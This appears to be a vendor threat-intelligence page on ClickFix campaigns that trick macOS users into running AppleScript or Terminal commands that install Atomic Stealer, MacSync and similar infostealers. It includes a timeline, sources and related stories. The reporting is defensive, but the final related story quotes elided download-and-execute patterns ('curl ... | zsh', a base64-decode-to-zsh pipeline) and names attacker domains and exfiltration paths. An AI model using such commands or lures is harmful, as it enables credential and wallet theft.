ClickFix macOS Campaign Abuses Script Editor to Deploy Atomic Stealer
Researchers identified a ClickFix-style campaign targeting macOS users that swaps Terminal-based execution for Script Editor to bypass newer Apple protections. Victims are lured to fake Apple-themed pages such as “Reclaim disk space on your Mac,” which invoke the applescript:// URL scheme and open Script Editor with a pre-filled AppleScript. If the user runs it, the script conceals a malicious shell command that decodes a URL, uses curl with TLS certificate validation disabled, and pipes the response directly into zsh for in-memory execution.
The activity, discovered by Jamf Threat Labs, ultimately downloads and launches a Mach-O variant of Atomic Stealer, an infostealer built to harvest browser credentials, saved passwords, cryptocurrency wallets, and other sensitive data from macOS systems. Researchers said the campaign appears to be an adaptation to Apple’s paste-command scanning protections added in macOS 26.4 for Terminal abuse; while newer macOS versions also warn about unidentified scripts, the attack can still succeed if users follow the prompts. Reported infrastructure tied to the campaign includes dryvecar.com, storage-fixes.squarespace.com, and cleanupmac.mssg.me.
Get ahead of threats like this
Mallory correlates global threat intelligence with your attack surface — know if you’re exposed before adversaries strike.
How this story unfolded
8 events from the most recent confirmed update back to the earliest known activity.
Researchers link campaign to supporting infrastructure
Analysis tied the campaign to infrastructure including dryvecar.com, storage-fixes.squarespace.com, and cleanupmac.mssg.me. The operation was described as targeting macOS users to steal browser credentials, saved passwords, cryptocurrency wallets, and other sensitive data.
Jamf Threat Labs identifies Atomic Stealer macOS campaign in the wild
Jamf researchers documented an active campaign delivering a variant of Atomic Stealer through Script Editor on macOS. They reported that the script fetched remote content with curl using disabled TLS certificate validation, executed it in memory, and ultimately downloaded a Mach-O payload.
Attackers shift ClickFix delivery from Terminal to macOS Script Editor
After Apple’s Terminal-focused protections, attackers adapted their technique by using the applescript:// URL scheme to open Script Editor with a pre-filled malicious AppleScript. The lure used fake Apple-themed disk cleanup pages to socially engineer users into running the script.
Apple adds Terminal paste-scanning protections in macOS 26.4
Apple introduced protections in macOS 26.4 to scan pasted commands in Terminal and warn users about potentially suspicious activity. The new safeguards were intended to reduce abuse of Terminal-based social engineering techniques such as ClickFix-style attacks.
Netskope identifies separate ClickFix macOS campaign targeting Asian finance
Netskope Threat Labs reported an active ClickFix campaign targeting macOS users in Asia’s finance sector with an AppleScript-based infostealer. The attack used fake CAPTCHA prompts to trick victims into pasting a malicious curl command, then displayed a persistent fake macOS password dialog to steal valid credentials and extensive browser, Keychain, extension, and cryptocurrency wallet data.
Guardio reports fake 'Mac Storage Fix' Google Ads scam targeting macOS users
Guardio published research on a scam using fake 'Mac Storage Fix' lures promoted via Google Ads to target macOS users. The campaign appears to be an earlier stage of the social-engineering activity later associated with ClickFix-style macOS malware delivery.
Intego reports Matryoshka ClickFix macOS stealer via typosquatting
Intego reported a new 'Matryoshka' ClickFix variant targeting macOS users through typosquatting infrastructure to deliver a stealer. The report indicates the campaign was already using ClickFix-style social engineering against Mac users before the later Google Ads and Script Editor activity documented by other researchers.
Microsoft traces ClickFix macOS activity back to January 2026
Microsoft Defender researchers reported that ClickFix had been targeting macOS users since at least January 2026, marking an expansion of the technique beyond Windows. The campaign used fake disk-space, error, and utility-install prompts on blogs and user-driven platforms to trick users into pasting Terminal commands that delivered Macsync, Shub Stealer, or Atomic macOS Stealer.
Related entities
Vulnerabilities, threat actors, malware, products, organizations, and breaches Mallory has linked to this story.
Sources
9 references tracked. Mallory keeps watching after this page renders.
ClickFix Campaign Evolves With Targeting Of MacOS Users
thecyberexpress.com
Open sourceMacOS ClickFix attacks deliver AppleScript stealers
theregister.com
Open sourceClickFix campaign delivers Mac malware via fake Apple page - Help Net Security
helpnetsecurity.com
Open sourceAtomic Stealer malware abuses macOS Script Editor in new ClickFix attack | brief | SC Media
scworld.com
Open sourceNew ClickFix Campaign Uses macOS Script Editor to Deliver Atomic Stealer
cybersecuritynews.com
Open sourceClickFix-Style MacOS Attack Uses Script Editor Trick
thecyberexpress.com
Open sourceClickFix Malware Uses macOS Script Editor to Deliver Atomic Stealer | Jamf Threat Labs
jamf.com
Open sourceGoogled a Mac Storage Fix Lately? It May Be a Scam
guard.io
Open sourceUnpacking the New “Matryoshka” ClickFix Variant: Typosquatting Campaign Delivers macOS Stealer - The Mac Security Blog Matryoshka ClickFix Variant Delivers macOS Stealer via Typosquatting
intego.com
Open sourceSee the full picture, correlated to your attack surface.
Map indicators from this story to your assets and identify affected systems in minutes.
Every observed campaign, victim, and pivot linked to actors named in this story.
Malware, exploits, and IOCs connected to the activity described here.
YARA, Sigma, and Snort rules deployed to your SIEM as soon as they’re published.
Get matching new stories delivered to your team as they break — not the next morning.
Ask questions about this story and take action on the answers.
Related stories
Other stories Mallory is tracking that overlap on entities, sources, or topic labels.
ClickFix Social Engineering Campaigns Using Terminal Commands to Install Stealers
Multiple reports highlighted **ClickFix**-style social engineering that convinces users to paste attacker-supplied commands into a terminal, leading to infostealer installation. Malwarebytes documented a macOS lure impersonating *CleanMyMac* via `cleanmymacos[.]org`, where victims are instructed to run a Terminal command that prints a reassuring message, decodes a hidden (base64) destination, and then downloads and executes a remote shell script via `zsh`. The resulting payload installs **SHub Stealer**, which targets saved passwords, browser data, Apple Keychain contents, Telegram sessions, and cryptocurrency wallets; it can also tamper with wallet applications (e.g., *Exodus*, *Atomic Wallet*, *Ledger Live*) to enable later theft of recovery phrases. Microsoft threat intelligence (as reported by The Hacker News) described a parallel **Windows** ClickFix campaign that shifts from the traditional Run-dialog paste to **Windows Terminal** (`wt.exe`) using the `Win + X → I` shortcut, exploiting the tool’s administrative legitimacy to reduce suspicion and evade detections tuned to Run-dialog abuse. In that chain, users paste a hex-encoded/XOR-compressed command that spawns additional Terminal/PowerShell stages to decode scripts, download a ZIP payload plus a legitimate-but-renamed **7-Zip** binary, extract additional components, establish persistence via **scheduled tasks**, configure **Microsoft Defender exclusions**, and ultimately deploy **Lumma Stealer** (including use of `QueueUserAPC()` for injection).
Mar 31, 2026
ClickFix Campaigns Deliver MacSync Infostealer to macOS Users
Researchers reported **three ClickFix campaigns** that used social engineering rather than software exploitation to infect **macOS** users with the **MacSync** infostealer. The activity evolved over several months, beginning with fake sponsored search results for an **OpenAI Atlas** browser download hosted on fraudulent pages, then shifting to malicious workflows that abused shared **ChatGPT** conversations and GitHub-themed landing pages to make the infection chain appear legitimate. In each case, victims were instructed to open **Terminal** and paste commands, allowing the malware to be installed through user action instead of a traditional exploit. The most recent campaign introduced a more advanced **MacSync** variant with **multi-stage loaders**, **dynamic AppleScript payloads**, and **in-memory execution** intended to improve evasion and persistence. Reporting indicates the later activity targeted users in **Belgium, India, and parts of North and South America**, while researchers said it remains unclear whether all three campaigns were conducted by the same threat actor. The findings underscore a broader trend of attackers adapting **ClickFix** lures for macOS, using trusted platforms, sponsored links, and fake AI-tool installers to steal credentials and other sensitive data while bypassing file-based defenses by persuading users to execute the attack themselves.
May 8, 2026
ClickFix Campaign Abuses Claude Artifacts and Google Ads to Deliver macOS Infostealers
Threat actors are running a **ClickFix**-style social-engineering campaign that abuses **Google sponsored search results** to funnel macOS users to malicious content hosted on legitimate platforms, including **Anthropic Claude public artifacts** (`claude.ai`) and **Medium** pages impersonating trusted sources (e.g., Apple Support). The lures target common search queries such as “online DNS resolver,” “macOS CLI disk space analyzer,” and “HomeBrew,” then instruct victims to paste and run Terminal commands that decode/execute payloads (e.g., `echo "..." | base64 -D | zsh` or `curl ... | zsh`). Researchers (Moonlock Lab/MacPaw and AdGuard) reported that the malicious Claude artifact accumulated **~12,300 to 15,600 views**, indicating significant exposure (reported as **10,000+** and **15,000+** potential victims across coverage). The payloads deliver macOS information-stealing malware, including **MacSync**, which collects data such as **Keychain credentials, browser data, and cryptocurrency wallet files**. Reported tradecraft includes downloading and executing a shell script, using an AppleScript component for theft, staging stolen data into `/tmp/osalogging.zip`, and exfiltrating via HTTP POST to attacker infrastructure (e.g., `a2abotnet[.]com/gate`, with C2 paths like `a2abotnet[.]com/dynamic`). The malware attempts to blend in by spoofing legitimate macOS browser User-Agent strings and includes retry logic for large/chunked uploads, then removes staging artifacts to reduce forensic traces.
May 17, 2026